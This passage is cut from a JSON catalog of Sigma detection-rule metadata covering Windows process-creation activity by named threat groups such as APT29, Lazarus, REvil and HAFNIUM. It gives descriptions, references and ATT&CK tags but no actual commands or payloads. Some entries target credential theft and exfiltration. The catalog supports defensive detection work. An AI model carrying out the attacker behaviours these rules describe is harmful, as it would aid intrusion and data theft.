from a non-standard folder" + ], + "filename": "proc_creation_win_anydesk_susp_folder.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_anydesk_susp_folder.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "065b00ca-5d5c-4557-ac95-64a6d0b64d86", + "value": "Use of Anydesk Remote Access Software from Suspicious Folder" + }, + { + "description": "Detects specific process parameters as used by ACTINIUM scheduled task persistence creation.", + "meta": { + "author": "Andreas Hunkeler (@Karneades)", + "creation_date": "2022/02/07", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_apt_actinium_persistence.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_actinium_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1053", + "attack.t1053.005" + ] + }, + "uuid": "e1118a8f-82f5-44b3-bb6b-8a284e5df602", + "value": "Scheduled Task WScript VBScript" + }, + { + "description": "This method detects a suspicious PowerShell command line combination as used by APT29 in a campaign against U.S. think tanks.", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/12/04", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_apt29_thinktanks.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/", + "https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_apt29_thinktanks.yml" + ], + "tags": [ + "attack.execution", + "attack.g0016", + "attack.t1059.001" + ] + }, + "uuid": "033fe7d6-66d1-4240-ac6b-28908009c71f", + "value": "APT29" + }, + { + "description": "Detects activity that could be related to Baby Shark malware", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/02/24", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_babyshark.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_babyshark.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.003", + "attack.t1059.001", + "attack.discovery", + "attack.t1012", + "attack.defense_evasion", + "attack.t1218.005" + ] + }, + "uuid": "2b30fa36-3a18-402f-a22d-bf4ce2189f35", + "value": "Baby Shark Activity" + }, + { + "description": "Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/02/21", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_bear_activity_gtr19.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_bear_activity_gtr19.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.001", + "attack.t1003.003" + ] + }, + "uuid": "b83f5166-9237-4b5e-9cd4-7b5d52f4d8ee", + "value": "Judgement Panda Credential Access Activity" + }, + { + "description": "Detects a suspicious DLL loading from AppData Local path as described in BlueMashroom report", + "meta": { + "author": "Florian Roth, Tim Shelton", + "creation_date": "2019/10/02", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_apt_bluemashroom.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.virusbulletin.com/conference/vb2019/abstracts/apt-cases-exploiting-vulnerabilities-region-specific-software", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_bluemashroom.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.010" + ] + }, + "uuid": "bd70d3f8-e60e-4d25-89f0-0b5a9cff20e0", + "value": "BlueMashroom DLL Load" + }, + { + "description": "Detects Chafer activity attributed to OilRig as reported in Nyotron report in March 2018", + "meta": { + "author": "Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "creation_date": "2018/03/23", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_chafer_mar18.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://nyotron.com/nyotron-discovers-next-generation-oilrig-attacks/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_chafer_mar18.yml" + ], + "tags": [ + "attack.persistence", + "attack.g0049", + "attack.t1053.005", + "attack.s0111", + "attack.t1543.003", + "attack.defense_evasion", + "attack.t1112", + "attack.command_and_control", + "attack.t1071.004" + ] + }, + "uuid": "ce6e34ca-966d-41c9-8d93-5b06c8b97a06", + "value": "Chafer Activity" + }, + { + "description": "Detects wmiexec vbs version execution by wscript or cscript", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/04/07", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_apt_cloudhopper.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://web.archive.org/web/20180725233601/https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_cloudhopper.yml" + ], + "tags": [ + "attack.execution", + "attack.g0045", + "attack.t1059.005" + ] + }, + "uuid": "966e4016-627f-44f7-8341-f394905c361f", + "value": "WMIExec VBS Script" + }, + { + "description": "Detects CrackMapExecWin Activity as Described by NCSC", + "meta": { + "author": "Markus Neis", + "creation_date": "2018/04/08", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_dragonfly.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control", + "https://attack.mitre.org/software/S0488/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_dragonfly.yml" + ], + "tags": [ + "attack.g0035", + "attack.credential_access", + "attack.discovery", + "attack.t1110", + "attack.t1087" + ] + }, + "uuid": "04d9079e-3905-4b70-ad37-6bdf11304965", + "value": "CrackMapExecWin" + }, + { + "description": "Detects Elise backdoor acitivty as used by APT32", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/01/31", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_elise.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://community.rsa.com/community/products/netwitness/blog/2018/02/13/lotus-blossom-continues-asean-targeting", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_elise.yml" + ], + "tags": [ + "attack.g0030", + "attack.g0050", + "attack.s0081", + "attack.execution", + "attack.t1059.003" + ] + }, + "uuid": "e507feb7-5f73-4ef6-a970-91bb6f6d744f", + "value": "Elise Backdoor" + }, + { + "description": "Detects the execution of DLL side-loading malware used by threat group Emissary Panda aka APT27", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/09/03", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_emissarypanda_sep19.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/579e7587-f09d-4aae-8b07-472833262965", + "https://twitter.com/cyb3rops/status/1168863899531132929", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_emissarypanda_sep19.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002" + ] + }, + "uuid": "9aa01d62-7667-4d3b-acb8-8cb5103e2014", + "value": "Emissary Panda Malware SLLauncher" + }, + { + "description": "Detects EmpireMonkey APT reported Activity", + "meta": { + "author": "Markus Neis", + "creation_date": "2019/04/02", + "falsepositive": [ + "Very Unlikely" + ], + "filename": "proc_creation_win_apt_empiremonkey.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/a4107649-8cb0-41af-ad75-113152d4d57b", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_empiremonkey.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.010" + ] + }, + "uuid": "10152a7b-b566-438f-a33c-390b607d1c8d", + "value": "Empire Monkey" + }, + { + "description": "Detects a specific tool and export used by EquationGroup", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/03/04", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_equationgroup_dll_u_load.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/adamcaudill/EquationGroupLeak/search?utf8=%E2%9C%93&q=dll_u&type=", + "https://securelist.com/apt-slingshot/84312/", + "https://twitter.com/cyb3rops/status/972186477512839170", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_equationgroup_dll_u_load.yml" + ], + "tags": [ + "attack.g0020", + "attack.defense_evasion", + "attack.t1218.011" + ] + }, + "uuid": "d465d1d8-27a2-4cca-9621-a800f37cf72e", + "value": "Equation Group DLL_U Load" + }, + { + "description": "Detects Golden Chickens deployment method as used by Evilnum in report published in July 2020", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/07/10", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_evilnum_jul20.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/", + "https://app.any.run/tasks/33d37fdf-158d-4930-aa68-813e1d5eb8ba/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_evilnum_jul20.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011" + ] + }, + "uuid": "8acf3cfa-1e8c-4099-83de-a0c4038e18f0", + "value": "EvilNum Golden Chickens Deployment via OCX Files" + }, + { + "description": "Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.", + "meta": { + "author": "Tim Burrell", + "creation_date": "2020/02/07", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_gallium.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_gallium.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1212", + "attack.command_and_control", + "attack.t1071" + ] + }, + "uuid": "18739897-21b1-41da-8ee4-5b786915a676", + "value": "GALLIUM Artefacts" + }, + { + "description": "Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.", + "meta": { + "author": "Tim Burrell", + "creation_date": "2020/02/07", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_gallium_sha1.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_gallium_sha1.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1212", + "attack.command_and_control", + "attack.t1071" + ] + }, + "uuid": "440a56bf-7873-4439-940a-1c8a671073c2", + "value": "GALLIUM Sha1 Artefacts" + }, + { + "description": "Detects suspicious UltraVNC command line flag combination that indicate a auto reconnect upon execution, e.g. startup (as seen being used by Gamaredon threat group)", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2022/03/04", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_gamaredon_ultravnc.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.ria.ee/sites/default/files/content-editors/kuberturve/tale_of_gamaredon_infection.pdf", + "https://unit42.paloaltonetworks.com/unit-42-title-gamaredon-group-toolset-evolution", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_gamaredon_ultravnc.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.g0047", + "attack.t1021.005" + ] + }, + "uuid": "871b9555-69ca-4993-99d3-35a59f9f3599", + "value": "Suspicious UltraVNC Execution" + }, + { + "description": "Detects tools and process executions as observed in a Greenbug campaign in May 2020", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/05/20", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_greenbug_may20.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_greenbug_may20.yml" + ], + "tags": [ + "attack.g0049", + "attack.execution", + "attack.t1059.001", + "attack.command_and_control", + "attack.t1105", + "attack.defense_evasion", + "attack.t1036.005" + ] + }, + "uuid": "3711eee4-a808-4849-8a14-faf733da3612", + "value": "Greenbug Campaign Indicators" + }, + { + "description": "Detects activity observed by different researchers to be HAFNIUM group activity (or related) on Exchange servers", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/03/09", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_hafnium.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/", + "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", + "https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289/3", + "https://twitter.com/GadixCRK/status/1369313704869834753?s=20", + "https://twitter.com/BleepinComputer/status/1372218235949617161", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_hafnium.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546", + "attack.t1053" + ] + }, + "uuid": "bbb2dedd-a0e3-46ab-ba6c-6c82ae7a9aa7", + "value": "Exchange Exploitation Activity" + }, + { + "description": "Detects Hurricane Panda Activity", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/03/04", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_hurricane_panda.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.crowdstrike.com/blog/crowdstrike-discovers-use-64-bit-zero-day-privilege-escalation-exploit-cve-2014-4113-hurricane-panda/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_hurricane_panda.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.g0009", + "attack.t1068" + ] + }, + "uuid": "0eb2107b-a596-422e-b123-b389d5594ed7", + "value": "Hurricane Panda Activity" + }, + { + "description": "Detects Judgement Panda activity as described in Global Threat Report 2019 by Crowdstrike", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/02/21", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_judgement_panda_gtr19.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_judgement_panda_gtr19.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.g0010", + "attack.credential_access", + "attack.t1003.001", + "attack.exfiltration", + "attack.t1560.001" + ] + }, + "uuid": "03e2746e-2b31-42f1-ab7a-eb39365b2422", + "value": "Judgement Panda Exfil Activity" + }, + { + "description": "Detects Registry modifications performed by Ke3chang malware in campaigns running in 2019 and 2020", + "meta": { + "author": "Markus Neis, Swisscom", + "creation_date": "2020/06/18", + "falsepositive": [ + "Will need to be looked for combinations of those processes" + ], + "filename": "proc_creation_win_apt_ke3chang_regadd.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.verfassungsschutz.de/embed/broschuere-2020-06-bfv-cyber-brief-2020-01.pdf", + "https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_ke3chang_regadd.yml" + ], + "tags": [ + "attack.g0004", + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "7b544661-69fc-419f-9a59-82ccc328f205", + "value": "Ke3chang Registry Key Modifications" + }, + { + "description": "Detects different process creation events as described in Malwarebytes's threat report on Lazarus group activity", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2021/04/20", + "falsepositive": [ + "Should not be any false positives" + ], + "filename": "proc_creation_win_apt_lazarus_activity_apr21.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://blog.malwarebytes.com/malwarebytes-news/2021/04/lazarus-apt-conceals-malicious-code-within-bmp-file-to-drop-its-rat/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_lazarus_activity_apr21.yml" + ], + "tags": [ + "attack.g0032", + "attack.execution", + "attack.t1106" + ] + }, + "uuid": "4a12fa47-c735-4032-a214-6fab5b120670", + "value": "Lazarus Activity Apr21" + }, + { + "description": "Detects different process creation events as described in various threat reports on Lazarus group activity", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/12/23", + "falsepositive": [ + "Overlap with legitimate process activity in some cases (especially selection 3 and 4)" + ], + "filename": "proc_creation_win_apt_lazarus_activity_dec20.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/", + "https://www.hvs-consulting.de/lazarus-report/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_lazarus_activity_dec20.yml" + ], + "tags": [ + "attack.g0032", + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "24c4d154-05a4-4b99-b57d-9b977472443a", + "value": "Lazarus Activity Dec20" + }, + { + "description": "Detects different loaders as described in various threat reports on Lazarus group activity", + "meta": { + "author": "Florian Roth, wagga", + "creation_date": "2020/12/23", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_lazarus_loader.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.hvs-consulting.de/lazarus-report/", + "https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_lazarus_loader.yml" + ], + "tags": [ + "attack.g0032", + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "7b49c990-4a9a-4e65-ba95-47c9cc448f6e", + "value": "Lazarus Loaders" + }, + { + "description": "Detects executables launched outside their default directories as used by Lazarus Group (Bluenoroff)", + "meta": { + "author": "Trent Liffick (@tliffick), Bartlomiej Czyz (@bczyz1)", + "creation_date": "2020/06/03", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_lazarus_session_highjack.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_lazarus_session_highjack.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.005" + ] + }, + "uuid": "3f7f5b0b-5b16-476c-a85f-ab477f6dd24b", + "value": "Lazarus Session Highjacker" + }, + { + "description": "Detects suspicious command line patterns as seen being used by MERCURY threat actor", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/08/26", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_mercury.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_mercury.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.g0069" + ] + }, + "uuid": "a62298a3-1fe0-422f-9a68-ffbcbc5a123d", + "value": "MERCURY Command Line Patterns" + }, + { + "description": "Detecting DNS tunnel activity for Muddywater actor", + "meta": { + "author": "@caliskanfurkan_", + "creation_date": "2020/06/04", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_muddywater_dnstunnel.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.virustotal.com/gui/file/5ad401c3a568bd87dd13f8a9ddc4e450ece61cd9ce4d1b23f68ce0b1f3c190b7/", + "https://www.vmray.com/analyses/5ad401c3a568/report/overview.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_muddywater_dnstunnel.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.004" + ] + }, + "uuid": "36222790-0d43-4fe8-86e4-674b27809543", + "value": "DNS Tunnel Technique from MuddyWater" + }, + { + "description": "Detects specific process parameters as used by Mustang Panda droppers", + "meta": { + "author": "Florian Roth, oscd.community", + "creation_date": "2019/10/30", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_apt_mustangpanda.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/7ca5661d-a67b-43ec-98c1-dd7a8103c256/", + "https://app.any.run/tasks/b12cccf3-1c22-4e28-9d3e-c7a6062f3914/", + "https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_mustangpanda.yml" + ], + "tags": [ + "attack.t1587.001", + "attack.resource_development" + ] + }, + "uuid": "2d87d610-d760-45ee-a7e6-7a6f2a65de00", + "value": "Mustang Panda Dropper" + }, + { + "description": "Detects process command line patterns and locations used by REvil group in Kaseya incident (can also match on other malware)", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/07/03", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_revil_kaseya.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://community.sophos.com/b/security-blog/posts/active-ransomware-attack-on-kaseya-customers", + "https://www.joesandbox.com/analysis/443736/0/html", + "https://doublepulsar.com/kaseya-supply-chain-attack-delivers-mass-ransomware-event-to-us-companies-76e4ec6ec64b", + "https://therecord.media/revil-ransomware-executes-supply-chain-attack-via-malicious-kaseya-update/", + "https://blog.truesec.com/2021/07/04/kaseya-supply-chain-attack-targeting-msps-to-deliver-revil-ransomware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_revil_kaseya.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059", + "attack.g0115" + ] + }, + "uuid": "5de632bc-7fbd-4c8a-944a-fce55c59eae5", + "value": "REvil Kaseya Incident Malware Patterns" + }, + { + "description": "Detects Silence downloader. These commands are hardcoded into the binary.", + "meta": { + "author": "Alina Stepchenkova, Roman Rezvukhin, Group-IB, oscd.community", + "creation_date": "2019/11/01", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_silence_downloader_v3.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_silence_downloader_v3.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001", + "attack.discovery", + "attack.t1057", + "attack.t1082", + "attack.t1016", + "attack.t1033", + "attack.g0091" + ] + }, + "uuid": "170901d1-de11-4de7-bccb-8fa13678d857", + "value": "Silence.Downloader V3" + }, + { + "description": "Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group", + "meta": { + "author": "Florian Roth, Bartlomiej Czyz (@bczyz1)", + "creation_date": "2019/03/04", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_slingshot.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://securelist.com/apt-slingshot/84312/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_slingshot.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1053.005", + "attack.s0111" + ] + }, + "uuid": "958d81aa-8566-4cea-a565-59ccd4df27b0", + "value": "Defrag Deactivation" + }, + { + "description": "Detects Trojan loader activity as used by APT28", + "meta": { + "author": "Florian Roth, Jonhnathan Ribeiro, oscd.community", + "creation_date": "2018/03/01", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_sofacy.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://researchcenter.paloaltonetworks.com/2018/02/unit42-sofacy-attacks-multiple-government-entities/", + "https://www.reverse.it/sample/e3399d4802f9e6d6d539e3ae57e7ea9a54610a7c4155a6541df8e94d67af086e?environmentId=100", + "https://twitter.com/ClearskySec/status/960924755355369472", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_sofacy.yml" + ], + "tags": [ + "attack.g0007", + "attack.execution", + "attack.t1059.003", + "attack.defense_evasion", + "car.2013-10-002", + "attack.t1218.011" + ] + }, + "uuid": "ba778144-5e3d-40cf-8af9-e28fb1df1e20", + "value": "Sofacy Trojan Loader Activity" + }, + { + "description": "Suspicious behaviours related to an actor tracked by Microsoft as SOURGUM", + "meta": { + "author": "MSTIC, FPT.EagleEye", + "creation_date": "2021/06/15", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_sourgrum.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.virustotal.com/gui/file/c299063e3eae8ddc15839767e83b9808fd43418dc5a1af7e4f44b97ba53fbd3d/detection", + "https://github.com/Azure/Azure-Sentinel/blob/43e9be273dca321295190bfc4902858e009d4a35/Detections/MultipleDataSources/SOURGUM_IOC.yaml", + "https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_sourgrum.yml" + ], + "tags": [ + "attack.t1546", + "attack.t1546.015", + "attack.persistence", + "attack.privilege_escalation" + ] + }, + "uuid": "7ba08e95-1e0b-40cd-9db5-b980555e42fd", + "value": "SOURGUM Actor Behaviours" + }, + { + "description": "Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/10/22", + "falsepositive": [ + "Renamed SysInternals tool" + ], + "filename": "proc_creation_win_apt_ta17_293a_ps.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.us-cert.gov/ncas/alerts/TA17-293A", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_ta17_293a_ps.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.g0035", + "attack.t1036.003", + "car.2013-05-009" + ] + }, + "uuid": "18da1007-3f26-470f-875d-f77faf1cab31", + "value": "Ps.exe Renamed SysInternals Tool" + }, + { + "description": "Detects mshta loaded by wmiprvse as parent as used by TA505 malicious documents", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/12/08", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_ta505_dropper.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/ForensicITGuy/status/1334734244120309760", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_ta505_dropper.yml" + ], + "tags": [ + "attack.execution", + "attack.g0092", + "attack.t1106" + ] + }, + "uuid": "18cf6cf0-39b0-4c22-9593-e244bdc9a2d4", + "value": "TA505 Dropper Load Pattern" + }, + { + "description": "Detects specific process characteristics of Chinese TAIDOOR RAT malware load", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/07/30", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_taidoor.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-216a", + 